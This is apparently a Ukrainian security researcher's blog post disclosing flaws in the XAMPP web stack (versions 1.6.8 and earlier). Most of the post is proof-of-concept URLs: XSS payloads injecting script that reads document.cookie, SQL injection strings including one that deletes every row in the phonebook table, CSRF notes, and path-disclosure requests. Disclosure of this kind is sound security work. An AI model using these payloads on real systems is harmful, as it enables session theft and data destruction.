Нові уразливості в XAMPP
19:38 01.08.200925.06.2009
У червні, 23.06.2009, я знайшов Cross-Site Scripting, Cross-Site Request Forgery, SQL Injection та Full path disclosure уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.
Раніше я вже писав про уразливості в XAMPP.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
01.08.2009
XSS:
http://site/xampp/ming.php?text=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
CSRF:
http://site/xampp/phonebook.php
Можна видаляти та додавати дані в тестовій таблиці (як через CSRF, так і через Insufficient Authorization уразливості). А також проводити SQL Injection через CSRF атаки.
XSS (persistent):
http://site/xampp/phonebook.php?lastname=%3Cscript%3Ealert(document.cookie)%3C/script%3E&firstname=1
http://site/xampp/phonebook.php?firstname=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/xampp/phonebook.php?firstname=1&phone=%3Cscript%3Ealert(document.cookie)%3C/script%3E
SQL Injection:
http://site/xampp/phonebook.php?action=del&id=-1%20or%201=1
http://site/xampp/phonebook.php?lastname=',sqlite_version())/*&firstname=1 (mq off)
http://site/xampp/phonebook.php?firstname=',sqlite_version(),1)/* (mq off)
http://site/xampp/phonebook.php?firstname=1&phone='),(sqlite_version(),1,'1 (mq off)
Атака можлива при доступі в адмінку (через Insufficient Authorization), або через CSRF.
Full path disclosure:
http://site/xampp/phonebook.php?lastname=’&firstname=1
http://site/xampp/phonebook.php?firstname=’
http://site/xampp/phonebook.php?firstname=1&phone=’
Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).